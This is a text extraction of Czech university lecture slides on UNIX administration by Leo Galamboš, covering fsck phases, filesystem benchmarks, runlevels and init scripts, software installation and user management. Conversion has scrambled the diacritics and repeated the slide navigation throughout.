Instalace software Správa uživatelu˚ Dodatky
block DUP I=XXXX ˇ ˇ Inoda sdílí nekterý z datových bloku˚ s jinou. Je spuštena pomocná rutina, která vypíše cˇ ísla kolizních inodu. ˚
Cviˇcení
Fáze 2: Kontrola adresáˇru˚
Administrace UNIXu Leo Galamboš Instalace Pˇred instalací Instalace
ˇ Odstranuje adresáˇrové záznamy z vadných inodu˚ detektovaných v pˇredchozím kroku, kontroluje adresáˇre na validní inodové ukazatele.
Po instalaci
Souborové systémy Minix Filesystem ext2 Další vývoj fsck Benchmark Linuxu
ˇ Behové úrovneˇ OS Start OS Vypnutí OS
ROOT INODE NOT DIRECTORY (FIX?) Inoda 2 (koˇrenový adresáˇr) není adresáˇr, je možné ji ˇ transformovat, ale vetšinou s fatálním dopadem na obsah svazku.
*BSD OpenBSD SystemV Nová vlna
Instalace software Správa uživatelu˚ Dodatky Cviˇcení
Fáze 2: Kontrola adresáˇru˚
Administrace UNIXu Leo Galamboš
OUT OF RANGE I=XXXX NAME=YYYY (REMOVE?)
Instalace
Nesprávné cˇ íslo inody. Chybu lze ponechat anebo soubor kompletneˇ zrušit.
Souborové systémy
Pˇred instalací Instalace Po instalaci
Minix Filesystem ext2 Další vývoj
UNALLOCATED I=XXXX OWNER=. MODE=. SIZE=. MTIME=. TYPE=. (REMOVE?)
fsck Benchmark Linuxu
ˇ Behové úrovneˇ OS Start OS
Adresáˇr používá nealokovanou inodu. Chybu lze ponechat anebo soubor kompletneˇ zrušit.
Vypnutí OS *BSD OpenBSD SystemV Nová vlna
BAD/DUP I=XXXX OWNER=. MODE=. SIZE=. MTIME=. TYPE=. (REMOVE?)
Instalace software Správa uživatelu˚ Dodatky
Inoda odkazovala vadný nebo duplicitní blok. Chybu lze ponechat anebo soubor kompletneˇ zrušit.
Cviˇcení
Fáze 3: Kontrola dosažitelnosti adresáˇru˚
Administrace UNIXu Leo Galamboš Instalace Pˇred instalací Instalace Po instalaci
Souborové systémy Minix Filesystem ext2
Vytváˇrí lost+found adresáˇr, kam jsou umíst’ovány všechny nedosažitelné adresáˇrové objekty. V tomto kroku (zatím) pouze adresáˇre.
Další vývoj fsck Benchmark Linuxu
ˇ Behové úrovneˇ OS Start OS Vypnutí OS *BSD OpenBSD SystemV Nová vlna
Instalace software Správa uživatelu˚ Dodatky Cviˇcení
Fáze 4: Kontrola poˇctu odkazu˚ a vazeb
Administrace UNIXu Leo Galamboš
UNREF FILE I=XXXX OWNER=. MODE=. SIZE=. MTIME=. TYPE=. (RECONNECT?)
Instalace Pˇred instalací Instalace
Soubor není odkazován, muže ˚ být smazán anebo ˇ do lost+found. Prázdné, neodkazované umísten soubory jsou automaticky smazány.
Po instalaci
Souborové systémy Minix Filesystem ext2 Další vývoj fsck
LINK COUNT DIR/FILE I=XXXX OWNER=. MODE=. SIZE=. MTIME=. COUNT=. (ADJUST?) Poˇcet odkazu˚ na objekt nesouhlasí s poˇctem ˇ Korekce je vítána. . . zaznamenaným v inode.
BAD/DUP FILE I=XXXX OWNER=. MODE=. SIZE=. MTIME=. (CLEAR?) Adresáˇr nebo soubor používá vadný nebo duplicitní blok. Chybu lze ponechat anebo soubor kompletneˇ zrušit.
Benchmark Linuxu
ˇ Behové úrovneˇ OS Start OS Vypnutí OS *BSD OpenBSD SystemV Nová vlna
Instalace software Správa uživatelu˚ Dodatky Cviˇcení
Fáze 5: Kontrola Cylinder Groups
Administrace UNIXu Leo Galamboš Instalace Pˇred instalací Instalace Po instalaci
Souborové systémy Minix Filesystem ext2 Další vývoj
Zkontroluje mapy inodu˚ a datových bloku. ˚ Pˇríslušneˇ opraví i jejich seznamy “volných”.
fsck Benchmark Linuxu
ˇ Behové úrovneˇ OS Start OS Vypnutí OS *BSD OpenBSD SystemV Nová vlna
Instalace software Správa uživatelu˚ Dodatky Cviˇcení
Po kontrole souborového systému
Administrace UNIXu Leo Galamboš Instalace Pˇred instalací Instalace Po instalaci
pˇri velkém poˇctu defektu˚ spust’te opakovaneˇ zkontrolujte obsah lost+found, zvlášteˇ hledejte speciální soubory (zaˇrízení) ˇ r okamžiteˇ pojmenované roury i sockety lze témeˇ smazat ˇ originální umístení ˇ zbývajících souboru˚ a zjistete pˇrípadneˇ je obnovte ze záloh
Souborové systémy Minix Filesystem ext2 Další vývoj fsck Benchmark Linuxu
ˇ Behové úrovneˇ OS Start OS Vypnutí OS *BSD OpenBSD SystemV Nová vlna
Instalace software Správa uživatelu˚ Dodatky Cviˇcení
Administrace UNIXu
Postmark: rychlost FS na Linuxu
Leo Galamboš
Postmark test s náhodným create, delete, read, append na souborech do 10kB pro 50000 transakcí. Souborový systém ext2 ext3 jfs xfs ext2 ext3 jfs xfs ˇ ext2 Vítez:
Souboru˚ 1000 1000 1000 1000 20000 20000 20000 20000
ˇ Cas 89 187 546 274 781 868 891 1182
Instalace Pˇred instalací Instalace Po instalaci
Souborové systémy Minix Filesystem ext2 Další vývoj fsck Benchmark Linuxu
ˇ Behové úrovneˇ OS Start OS Vypnutí OS *BSD OpenBSD SystemV Nová vlna
Instalace software Správa uživatelu˚ Dodatky Cviˇcení
Administrace UNIXu
Benchmark Linuxu
Leo Galamboš Instalace
Time to open a file depending on number of subdirectories in the path
Pˇred instalací
45us
Instalace
Linux/Ext2 Linux/Ext3 Linux/ReiserFS Linux/XFS Linux/JFS Linux/SpadFS Spad/SpadFS Spad/Ext2
40us 35us
Po instalaci
Souborové systémy Minix Filesystem ext2 Další vývoj
30us
fsck Benchmark Linuxu
25us Time
ˇ Behové úrovneˇ OS Start OS
20us
Vypnutí OS *BSD OpenBSD
15us
SystemV Nová vlna
10us
Instalace software Správa uživatelu˚
5us
Dodatky 0s 0
20
40
60
80 100 120 Number of subdirectories
140
160
180
200
Cviˇcení
Administrace UNIXu
Benchmark Linuxu
Leo Galamboš Instalace
Time to read a file from cache depending on file size
Pˇred instalací
100ms
Instalace
Linux/Ext2 Linux/Ext3 Linux/ReiserFS Linux/XFS Linux/JFS Linux/SpadFS Spad/SpadFS Spad/Ext2
10ms
Po instalaci
Souborové systémy Minix Filesystem ext2 Další vývoj
1ms
fsck
Time
Benchmark Linuxu
ˇ Behové úrovneˇ OS 100us
Start OS Vypnutí OS *BSD OpenBSD
10us
SystemV Nová vlna
Instalace software 1us
Správa uživatelu˚ Dodatky 100ns 1B
10 B
100 B
1kB
10kB 100kB Number of bytes
1MB
10MB
100MB
Cviˇcení
Administrace UNIXu
Benchmark Linuxu
Leo Galamboš Instalace
Time to write a file to cache depending on file size
Pˇred instalací
100ms
Instalace
Linux/Ext2 Linux/Ext3 Linux/ReiserFS Linux/XFS Linux/JFS Linux/SpadFS Spad/SpadFS Spad/Ext2
10ms
Po instalaci
Souborové systémy Minix Filesystem ext2 Další vývoj fsck
1ms
Benchmark Linuxu
Time
ˇ Behové úrovneˇ OS Start OS Vypnutí OS
100us
*BSD OpenBSD SystemV Nová vlna
Instalace software
10us
Správa uživatelu˚ Dodatky 1us 1B
10 B
100 B
1kB
10kB 100kB Number of bytes
1MB
10MB
100MB
Cviˇcení
Administrace UNIXu
Benchmark Linuxu
Leo Galamboš Instalace
Time to create specified number of files in a directory (their total size is 1GB)
Pˇred instalací
1000s
Instalace
Linux/Ext2 Linux/Ext3 Linux/ReiserFS Linux/XFS Linux/JFS Linux/SpadFS Spad/SpadFS Spad/Ext2
800s
Po instalaci
Souborové systémy Minix Filesystem ext2 Další vývoj fsck
600s
Benchmark Linuxu
Time
ˇ Behové úrovneˇ OS Start OS Vypnutí OS
400s
*BSD OpenBSD SystemV Nová vlna
Instalace software
200s
Správa uživatelu˚ Dodatky 0s 10
100
1000 10000 Number of files
100000
1e+06
Cviˇcení
Administrace UNIXu
Benchmark Linuxu
Leo Galamboš Instalace
CPU consumption when creating specified number of files in a directory
Pˇred instalací
500s
Instalace
Linux/Ext2 Linux/Ext3 Linux/ReiserFS Linux/XFS Linux/JFS Linux/SpadFS Spad/SpadFS Spad/Ext2
400s
Po instalaci
Souborové systémy Minix Filesystem ext2
CPU time consumed
Další vývoj fsck
300s
Benchmark Linuxu
ˇ Behové úrovneˇ OS Start OS Vypnutí OS
200s
*BSD OpenBSD SystemV Nová vlna
Instalace software
100s
Správa uživatelu˚ Dodatky 0s 10
100
1000 10000 Number of files
100000
1e+06
Cviˇcení
Administrace UNIXu
Benchmark Linuxu
Leo Galamboš Instalace
Time to delete specified number of files in a directory
Pˇred instalací
400s
Instalace
Linux/Ext2 Linux/Ext3 Linux/ReiserFS Linux/XFS Linux/JFS Linux/SpadFS Spad/SpadFS Spad/Ext2
350s
300s
Po instalaci
Souborové systémy Minix Filesystem ext2 Další vývoj fsck
Time
250s
Benchmark Linuxu
ˇ Behové úrovneˇ OS 200s
Start OS Vypnutí OS *BSD
150s
OpenBSD SystemV Nová vlna
100s
Instalace software Správa uživatelu˚
50s
Dodatky 0s 10
100
1000 10000 Number of files
100000
1e+06
Cviˇcení
Administrace UNIXu
Benchmark Linuxu
Leo Galamboš Instalace
CPU consumption when deleting specified number of files in a directory
Pˇred instalací
100s
Instalace
Linux/Ext2 Linux/Ext3 Linux/ReiserFS Linux/XFS Linux/JFS Linux/SpadFS Spad/SpadFS Spad/Ext2
80s
Po instalaci
Souborové systémy Minix Filesystem ext2
CPU time consumed
Další vývoj fsck
60s
Benchmark Linuxu
ˇ Behové úrovneˇ OS Start OS Vypnutí OS
40s
*BSD OpenBSD SystemV Nová vlna
Instalace software
20s
Správa uživatelu˚ Dodatky 0s 10
100
1000 10000 Number of files
100000
1e+06
Cviˇcení
Administrace UNIXu
Benchmark Linuxu
Leo Galamboš Instalace
Time to read specified number of files in a directory (their total size is 1GB)
Pˇred instalací
250s
Instalace
Linux/Ext2 Linux/Ext3 Linux/ReiserFS Linux/XFS Linux/JFS Linux/SpadFS Spad/SpadFS Spad/Ext2
200s
Po instalaci
Souborové systémy Minix Filesystem ext2 Další vývoj fsck
150s
Benchmark Linuxu
Time
ˇ Behové úrovneˇ OS Start OS Vypnutí OS
100s
*BSD OpenBSD SystemV Nová vlna
Instalace software
50s
Správa uživatelu˚ Dodatky 0s 10
100
1000 10000 Number of files
100000
1e+06
Cviˇcení
Administrace UNIXu
Benchmark Linuxu
Leo Galamboš Instalace
CPU consumption when reading specified number of files in a directory
Pˇred instalací
100s
Instalace
Linux/Ext2 Linux/Ext3 Linux/ReiserFS Linux/XFS Linux/JFS Linux/SpadFS Spad/SpadFS Spad/Ext2
80s
Po instalaci
Souborové systémy Minix Filesystem ext2
CPU time consumed
Další vývoj fsck
60s
Benchmark Linuxu
ˇ Behové úrovneˇ OS Start OS Vypnutí OS
40s
*BSD OpenBSD SystemV Nová vlna
Instalace software
20s
Správa uživatelu˚ Dodatky 0s 10
100
1000 10000 Number of files
100000
1e+06
Cviˇcení
Administrace UNIXu
Benchmark Linuxu
Leo Galamboš Instalace
RAW I/O throughput of filesystems
Pˇred instalací
45MB/s Write Rewrite Read
40MB/s
Instalace Po instalaci
Souborové systémy
35MB/s
Minix Filesystem ext2 Další vývoj
30MB/s
fsck
Throughput
Benchmark Linuxu
25MB/s
ˇ Behové úrovneˇ OS Start OS Vypnutí OS
20MB/s
*BSD OpenBSD SystemV
15MB/s
Nová vlna
Instalace software
10MB/s
Správa uživatelu˚ 5MB/s
Dodatky Cviˇcení
0 B/s Lin/Ext2
Lin/Ext3
Lin/Reiser
Lin/XFS
Lin/JFS
Lin/Spad Spad/Spad Spad/Ext2
Administrace UNIXu
Benchmark Linuxu
Leo Galamboš
CPU consumption of filesystems when creating/rewriting/reading 8GiB file
Instalace Pˇred instalací
Write Rewrite Read
Instalace Po instalaci
Souborové systémy
20s
Minix Filesystem
CPU consumption (seconds)
ext2 Další vývoj fsck
15s
Benchmark Linuxu
ˇ Behové úrovneˇ OS Start OS Vypnutí OS
10s
*BSD OpenBSD SystemV Nová vlna
Instalace software
5s
Správa uživatelu˚ Dodatky Cviˇcení
0s Lin/Ext2
Lin/Ext3
Lin/Reiser
Lin/XFS
Lin/JFS
Lin/Spad
Spad/Spad Spad/Ext2
Administrace UNIXu
Benchmark Linuxu
Leo Galamboš
Time to do operatins with directory tree Light color bar represents the time needed to flush cache
Instalace Pˇred instalací Instalace
Extract with tar Copy directory tree Read directory tree Delete directory tree
200s
Po instalaci
Souborové systémy Minix Filesystem ext2 Další vývoj fsck
150s
Benchmark Linuxu
Time
ˇ Behové úrovneˇ OS Start OS Vypnutí OS
100s
*BSD OpenBSD SystemV Nová vlna
Instalace software
50s
Správa uživatelu˚ Dodatky Cviˇcení
0s Lin/Ext2
Lin/Ext3
Lin/Reiser
Lin/XFS
Lin/JFS
Lin/Spad
Spad/Spad Spad/Ext2
ˇ Behová úrovenˇ
Administrace UNIXu Leo Galamboš Instalace Pˇred instalací Instalace Po instalaci
Souborové systémy Minix Filesystem ext2
urˇcuje v jakém režimu UNIX pracuje ˇ je možné pˇrepínání mezi úrovnemi ˇ behová úrovenˇ muže ˚ sloužit (kupodivu) i pro vypnutí
Další vývoj fsck Benchmark Linuxu
ˇ Behové úrovneˇ OS Start OS Vypnutí OS *BSD OpenBSD SystemV Nová vlna
Instalace software Správa uživatelu˚ Dodatky Cviˇcení
Administrace UNIXu
Start OS
Leo Galamboš Instalace
ˇ cu˚ Start zavadeˇ
Pˇred instalací Instalace Po instalaci
Souborové systémy
Nahrání kernelu
Minix Filesystem ext2 Další vývoj fsck
ˇ kernelu Spuštení detekce HW
Benchmark Linuxu
ˇ Behové úrovneˇ OS Start OS Vypnutí OS *BSD
ˇ init(8) Spuštení
OpenBSD SystemV
BSD single-user
Nová vlna
Instalace software
Start-up skripty
Správa uživatelu˚ Dodatky
ˇ Bežící systém
Cviˇcení
Prostˇredky na vypnutí OS
Administrace UNIXu Leo Galamboš Instalace Pˇred instalací Instalace Po instalaci
halt(8), reboot(8), poweroff(8) — zastaví a pak cˇ eká, pˇrípadneˇ restartuje nebo vypne stroj shutdown(8) — korektní vypnutí systému s prodlevou a doprovodným hlášením. Oznámení je ukládáno do /etc/nologin ⇒ brání logování dalších uživatelu. ˚
Souborové systémy Minix Filesystem ext2 Další vývoj fsck Benchmark Linuxu
ˇ Behové úrovneˇ OS Start OS Vypnutí OS *BSD OpenBSD
init(8) — pˇrepnutí na úrovenˇ rezervovanou pro vypínání systému (SysV)
SystemV Nová vlna
Instalace software Správa uživatelu˚ Dodatky Cviˇcení
ˇ Behové úrovneˇ *BSD
Administrace UNIXu Leo Galamboš Instalace Pˇred instalací Instalace Po instalaci
Souborové systémy Minix Filesystem ext2 Další vývoj
Single-user pro opravy kritických stavu˚ ˇ Multi-user bežný režim
fsck Benchmark Linuxu
ˇ Behové úrovneˇ OS Start OS Vypnutí OS *BSD OpenBSD SystemV Nová vlna
Instalace software Správa uživatelu˚ Dodatky Cviˇcení
Start single-user
Administrace UNIXu Leo Galamboš Instalace Pˇred instalací Instalace Po instalaci
Souborové systémy Minix Filesystem ext2 Další vývoj fsck Benchmark Linuxu
ˇ Behové úrovneˇ OS Start OS Vypnutí OS *BSD OpenBSD SystemV Nová vlna
Instalace software Správa uživatelu˚ Dodatky Cviˇcení
Multi-user → single-user: kill -s TERM 1
Administrace UNIXu Leo Galamboš Instalace Pˇred instalací Instalace Po instalaci
Souborové systémy Minix Filesystem ext2 Další vývoj fsck Benchmark Linuxu
ˇ Behové úrovneˇ OS Start OS Vypnutí OS *BSD OpenBSD SystemV Nová vlna
Instalace software Správa uživatelu˚ Dodatky Cviˇcení
Single-user → multi-user: exit
Administrace UNIXu Leo Galamboš Instalace Pˇred instalací Instalace Po instalaci
Souborové systémy Minix Filesystem ext2 Další vývoj fsck Benchmark Linuxu
ˇ Behové úrovneˇ OS Start OS Vypnutí OS *BSD OpenBSD SystemV Nová vlna
Instalace software Správa uživatelu˚ Dodatky Cviˇcení
Start-up skripty OpenBSD
Administrace UNIXu Leo Galamboš Instalace Pˇred instalací
1
nastartování kernelu
2
ˇ /etc/rc spuštení
3
naˇctení /etc/rc.conf (defaultní nastavení)
4
naˇctení /etc/rc.conf.local (lokální nastavení)
5
mount filesystému˚
6
promazání /tmp
7
inicializace síteˇ /etc/netstart
Instalace Po instalaci
Souborové systémy Minix Filesystem ext2 Další vývoj fsck Benchmark Linuxu
ˇ Behové úrovneˇ OS Start OS Vypnutí OS *BSD
8
start démonu˚
OpenBSD SystemV Nová vlna
Instalace software
9
dodateˇcné kontroly: savecore, kvóty disku. . .
Správa uživatelu˚
10
start lokálních démonu˚ /etc/rc.local
Dodatky Cviˇcení
Vypnutí OpenBSD
Administrace UNIXu Leo Galamboš Instalace Pˇred instalací Instalace Po instalaci
Souborové systémy Minix Filesystem ext2 Další vývoj
1
ˇ /etc/rc.shutdown spuštení
2
inicializace zastavení
fsck Benchmark Linuxu
ˇ Behové úrovneˇ OS Start OS Vypnutí OS *BSD OpenBSD SystemV Nová vlna
Instalace software Správa uživatelu˚ Dodatky Cviˇcení
ˇ Behové úrovneˇ SystemV
Administrace UNIXu Leo Galamboš Instalace
0 halt
Pˇred instalací Instalace Po instalaci
1 single-user31 2 no network32
Souborové systémy Minix Filesystem ext2
3 multi-user 4 ??? 5 poweroff33 / xdm34 6 reboot
Další vývoj fsck Benchmark Linuxu
ˇ Behové úrovneˇ OS Start OS Vypnutí OS *BSD OpenBSD SystemV
7-9 nepoužívá se
Nová vlna
Instalace software Správa uživatelu˚ Dodatky 31
Single-user spouští /sbin/sulogin na /dev/console 32 IRIX: multi-user 33 Solaris 34 Linux world
Cviˇcení
Start-up skripty SystemV
Administrace UNIXu Leo Galamboš Instalace Pˇred instalací
1
nastartování kernelu
2
start init(8)
3
naˇctení /etc/inittab inicializace dle inittab(5)
4
1 2 3 5
ˇ initdefault: poˇcáteˇcní behová úrovenˇ sysinit: mount filesystému; ˚ boot(wait) start35 start N-úrovneˇ
ˇ skripty K* potom S* “inicializace” úrovne: /etc/rcN.d /etc/rc.d/rcN.d /etc/runlevels
Instalace Po instalaci
Souborové systémy Minix Filesystem ext2 Další vývoj fsck Benchmark Linuxu
ˇ Behové úrovneˇ OS Start OS Vypnutí OS *BSD OpenBSD SystemV Nová vlna
Instalace software Správa uživatelu˚ Dodatky Cviˇcení
35
clock, consolefont, hostname, checkfs
/etc/inittab
Administrace UNIXu Leo Galamboš
id:3:initdefault: # System initialization, mount local filesystems, etc. si::sysinit:/sbin/rc sysinit # Further system initialization, brings up the boot runlevel. rc::bootwait:/sbin/rc boot l0:0:wait:/sbin/rc shutdown l1:S1:wait:/sbin/rc single l2:2:wait:/sbin/rc nonetwork l3:3:wait:/sbin/rc default l4:4:wait:/sbin/rc default l5:5:wait:/sbin/rc default l6:6:wait:/sbin/rc reboot
Instalace Pˇred instalací Instalace Po instalaci
Souborové systémy Minix Filesystem ext2 Další vývoj fsck Benchmark Linuxu
ˇ Behové úrovneˇ OS Start OS Vypnutí OS
# TERMINALS c1:12345:respawn:/sbin/agetty 38400 tty1 linux c2:2345:respawn:/sbin/agetty 38400 tty2 linux c3:2345:respawn:/sbin/agetty 38400 tty3 linux c4:2345:respawn:/sbin/agetty 38400 tty4 linux c5:2345:respawn:/sbin/agetty 38400 tty5 linux c6:2345:respawn:/sbin/agetty 38400 tty6 linux # What to do at the "Three Finger Salute". ca:12345:ctrlaltdel:/sbin/shutdown -r now
*BSD OpenBSD SystemV Nová vlna
Instalace software Správa uživatelu˚ Dodatky Cviˇcení
x:a:once:/etc/X11/startDM.sh
Vypnutí SystemV
Administrace UNIXu Leo Galamboš Instalace Pˇred instalací Instalace Po instalaci
1
pˇrepnutí do požadované úrovneˇ
Souborové systémy Minix Filesystem
0 = halt 6 = reboot 5 = poweroff (Solaris) 2
ˇ skripty K* potom S* “inicializace” úrovne:
ext2 Další vývoj fsck Benchmark Linuxu
ˇ Behové úrovneˇ OS Start OS Vypnutí OS
/etc/rcN.d /etc/rc.d/rcN.d /etc/runlevels
*BSD OpenBSD SystemV Nová vlna
Instalace software Správa uživatelu˚ Dodatky Cviˇcení
systemd, launchd, upstart – hype?
Administrace UNIXu Leo Galamboš Instalace
Situace Servery: tvrdý stˇret puvodní ˚ a „moderní“ koncepce Klienti: zrychlení startu, ˇrešení komplexních závislostí
Pˇred instalací Instalace Po instalaci
Souborové systémy Minix Filesystem ext2 Další vývoj fsck Benchmark Linuxu
ˇ Behové úrovneˇ OS Start OS
Silná kritika zavádí uniformitu do celého ekosystému
Vypnutí OS *BSD OpenBSD SystemV Nová vlna
vnucuje mainstream a centralizaci
Instalace software
eliminuje alternativy
Správa uživatelu˚
. . . vede do pekla?
Dodatky Cviˇcení
Instalace
Administrace UNIXu Leo Galamboš Instalace Pˇred instalací Instalace Po instalaci
Souborové systémy Minix Filesystem
ze zdrojových kódu˚ autora balíˇcek od 3. výrobce balíˇckovací modul OS modul OS pro instalace (ports, portage)
ext2 Další vývoj fsck Benchmark Linuxu
ˇ Behové úrovneˇ OS Start OS Vypnutí OS *BSD OpenBSD SystemV Nová vlna
Instalace software Správa uživatelu˚ Dodatky Cviˇcení
Ze zdrojových kódu˚
Administrace UNIXu Leo Galamboš Instalace Pˇred instalací
Metoda configure && make && make install
Klady ˇ verze okamžitá instalace nejnovejší
Instalace Po instalaci
Souborové systémy Minix Filesystem ext2 Další vývoj
možnost libovolné konfigurace
fsck Benchmark Linuxu
ˇ Behové úrovneˇ OS
Zápory
Start OS Vypnutí OS *BSD
ˇ eˇ režie na správu s poˇctem balíˇcku˚ roste neúmern
OpenBSD SystemV Nová vlna
obtížná orientace v parametrech (systémových ˇ promenných) pro správný build
Instalace software
možná kolize s balíˇckovacím modulem OS
Dodatky
Správa uživatelu˚
Cviˇcení
Speciální balíˇcek od výrobce
Administrace UNIXu Leo Galamboš Instalace Pˇred instalací
Klady pohodlné (pokud máme balíˇcek pro naši distribuci)
Instalace Po instalaci
Souborové systémy Minix Filesystem
možnost oficiální “reklamace” typicky už je prebuildován
ext2 Další vývoj fsck Benchmark Linuxu
ˇ Behové úrovneˇ OS
Zápory
Start OS Vypnutí OS *BSD
nepohodlné (pokud nemáme balíˇcek pro naši distribuci) ˇ v pˇrípadeˇ problému˚ se težko zjišt’uje duvod ˚ kolize nelze snadno rebuildovat na konkrétní CPU
OpenBSD SystemV Nová vlna
Instalace software Správa uživatelu˚ Dodatky Cviˇcení
Balíˇckovací modul OS
Administrace UNIXu Leo Galamboš Instalace
Klady ˇ vetšinou prebuild registrace do centrální báze instalovaného software — snadný mngm doinstaluje potˇrebné balíˇcky, ohlídá kolize
Pˇred instalací Instalace Po instalaci
Souborové systémy Minix Filesystem ext2 Další vývoj fsck Benchmark Linuxu
ˇ Behové úrovneˇ OS Start OS
Zápory
Vypnutí OS *BSD OpenBSD
nelze snadno rebuildovat na konkrétní CPU
SystemV Nová vlna
kolize potˇrebných balíˇcku˚ zablokují instalaci
Instalace software
info o konfiguracích potˇrebných balíˇcku˚ snadno “uplavou”
Správa uživatelu˚ Dodatky Cviˇcení
Balíˇckovací systém v *BSD
Administrace UNIXu Leo Galamboš Instalace Pˇred instalací Instalace
pkg_info seznam všech nainstalovaných balíˇcku˚ pkg_add instalace balíˇcku pkg_delete odinstalování balíˇcku
Po instalaci
Souborové systémy Minix Filesystem ext2 Další vývoj fsck
Balíˇckem je typicky .tgz nebo .tbz archív, který byl vyroben v rámci stavby software z portu˚ /usr/ports/packages.
Benchmark Linuxu
ˇ Behové úrovneˇ OS Start OS Vypnutí OS *BSD OpenBSD
Podpora pro HTTP/FTP pkg_add ftp://ftp.openbsd.cz/pub/OpenBSD/ 3.7/packages/i386/mc-4.6.1pre1p0.tgz
SystemV Nová vlna
Instalace software Správa uživatelu˚ Dodatky Cviˇcení
Ports, portage
Administrace UNIXu Leo Galamboš Instalace Pˇred instalací
Klady build ze zdrojových kódu˚ autora
Instalace Po instalaci
Souborové systémy Minix Filesystem
vyrobí se “balíˇcek” pro balíˇckovaˇc OS ⇒ standardní cesta instalace snadný update
ext2 Další vývoj fsck Benchmark Linuxu
ˇ Behové úrovneˇ OS Start OS
rychlé
Vypnutí OS *BSD OpenBSD SystemV
Zápory bez znalosti konkrétní implementace ports se obtížneˇ tvoˇrí vlastní port
Nová vlna
Instalace software Správa uživatelu˚ Dodatky Cviˇcení
Ports v OpenBSD
Administrace UNIXu Leo Galamboš
Metoda cd /usr/ports/shells/bash && make XXXX fetch stáhne zdrojové soubory a patch-e checksum zkontroluje checksum36 depends instalace závislostí37
Instalace Pˇred instalací Instalace Po instalaci
Souborové systémy Minix Filesystem ext2 Další vývoj fsck
extract rozbalí zdrojové soubory patch na-patch-uje
Benchmark Linuxu
ˇ Behové úrovneˇ OS Start OS Vypnutí OS
configure spustí konfiguraci build postaví software fake instalace do fiktivního adresáˇre package tvorba balíˇcku nad fiktivní instalací install instalace balíˇcku 36 37
NO_CHECKSUM=Yes NO_DEPENDS=Yes
*BSD OpenBSD SystemV Nová vlna
Instalace software Správa uživatelu˚ Dodatky Cviˇcení
Vyhledávání v portech
Administrace UNIXu Leo Galamboš Instalace Pˇred instalací Instalace Po instalaci
Souborové systémy Minix Filesystem ext2 Další vývoj fsck Benchmark Linuxu
ˇ Behové úrovneˇ OS Start OS Vypnutí OS *BSD OpenBSD SystemV Nová vlna
Instalace software Správa uživatelu˚ Dodatky Cviˇcení
Báze /etc/passwd
Administrace UNIXu Leo Galamboš Instalace Pˇred instalací Instalace Po instalaci
Souborové systémy
pˇred v7 jediná centrální báze i s hash hesel po v7 obsahuje jen public položky, ostatní položky v shadow38 bázi login jméno domovský adresáˇr jméno uživatele. . .
Minix Filesystem ext2 Další vývoj fsck Benchmark Linuxu
ˇ Behové úrovneˇ OS Start OS Vypnutí OS *BSD OpenBSD SystemV Nová vlna
Instalace software Správa uživatelu˚ Dodatky Cviˇcení
38
/etc/shadow, /etc/master.passwd. . .
Správa báze uživatelu˚
Administrace UNIXu Leo Galamboš Instalace Pˇred instalací Instalace
useradd(8) založí úˇcet uživatele -m -k dir inicializace skeleton-em OpenBSD /etc/usermgmt.conf FreeBSD /etc/adduser.conf Linux /etc/default/useradd ˇ úˇctu uživatele na *BSD userdel(8) odstranení rmuser(8) ˇ položek úˇctu uživatele usermod(8) zmeny chpass(1) modifikace položek (shell, . . . ) gpasswd(1) modifikace skupin (pˇriˇrazení uživatelu, ˚ ...)
Po instalaci
Souborové systémy Minix Filesystem ext2 Další vývoj fsck Benchmark Linuxu
ˇ Behové úrovneˇ OS Start OS Vypnutí OS *BSD OpenBSD SystemV Nová vlna
Instalace software Správa uživatelu˚ Dodatky Cviˇcení
Korektní administrace
Administrace UNIXu Leo Galamboš Instalace Pˇred instalací Instalace Po instalaci
Souborové systémy 1 2
3
na root-a se neloguje
Minix Filesystem
ˇ ˇ se na root-a je lepší mít bežného uživatele a z nej pˇrehazovat pˇres su(8) nebo sudo(8)
Další vývoj
ˇ nekteré operaˇcní systémy39 dovolují su(8) jen uživatelum ˚ ve skupineˇ wheel
ext2
fsck Benchmark Linuxu
ˇ Behové úrovneˇ OS Start OS Vypnutí OS *BSD OpenBSD SystemV Nová vlna
Instalace software Správa uživatelu˚ Dodatky Cviˇcení
39
OpenBSD
Uzpusobení ˚ logování
Administrace UNIXu Leo Galamboš Instalace Pˇred instalací Instalace Po instalaci
/etc/issue Linux: text vypsaný pˇred výzvou k zadání pˇrihlašovacích údaju˚ muže ˚ obsahovat speciální sekvence rozpoznatelné getty(1) ˇ /etc/gettytab OpenBSD: definice terminálu umožnuje nastavovat i “initial message” a “login message” /etc/motd “Message Of The Day” vypíše login(1) po ˇ úspešném pˇrihlášení
Souborové systémy Minix Filesystem ext2 Další vývoj fsck Benchmark Linuxu
ˇ Behové úrovneˇ OS Start OS Vypnutí OS *BSD OpenBSD SystemV Nová vlna
Instalace software Správa uživatelu˚ Dodatky Cviˇcení
Dodatky
Administrace UNIXu Leo Galamboš Instalace
Solaris – halt, reboot, poweroff Nevypínají se démoni pˇres K* skripty, protože se v tomto konkrétním pˇrípadeˇ neˇcte /etc/rc.N.
Pˇred instalací Instalace Po instalaci
Souborové systémy Minix Filesystem ext2
*BSD – kontrola souborových systému˚ Kontrola je aktivní, pokud neexistuje soubor /fastboot.
Další vývoj fsck Benchmark Linuxu
ˇ Behové úrovneˇ OS Start OS Vypnutí OS
*BSD – bezpeˇcnost single-user
*BSD OpenBSD SystemV
Terminál definovaný jako “ttyC0 . . . vt220 on secure” v /etc/ttys:
Nová vlna
Instalace software Správa uživatelu˚
single-user nepožaduje heslo root-a multi-user muže ˚ se logovat root (pˇrímo)
Dodatky Cviˇcení
init.d implementace
Administrace UNIXu Leo Galamboš Instalace Pˇred instalací Instalace Po instalaci
f o r i i n / e t c / rcN . d / K∗ do $ i stop done
Souborové systémy Minix Filesystem ext2 Další vývoj fsck Benchmark Linuxu
ˇ Behové úrovneˇ OS
f o r i i n / e t c / rcN . d / S∗ do $i start done
Start OS Vypnutí OS *BSD OpenBSD SystemV Nová vlna
Instalace software Správa uživatelu˚ Dodatky Cviˇcení
Vyzkoušejte si RCS cd / e t c mkdir RCS c i −u soubor . c o n f co − l soubor . c o n f
Administrace UNIXu Leo Galamboš Instalace Pˇred instalací Instalace Po instalaci
Souborové systémy Minix Filesystem ext2
Ports
Další vývoj fsck Benchmark Linuxu
cd / u s r t a r z x f p o r t s . t a r . gz cd p o r t s / misc / mc make i n s t a l l
ˇ Behové úrovneˇ OS Start OS Vypnutí OS *BSD OpenBSD SystemV Nová vlna
Instalace software 1
2
Vytvoˇrte dva stroje v ruzných ˚ HUBech a jeden zapojený do obou HUBu. ˚ Použijte alesponˇ dva operaˇcní systémy. Napište skripty pro rychlou správu konfigurací pod RCS.
Správa uživatelu˚ Dodatky Cviˇcení
Vyzkoušejte si
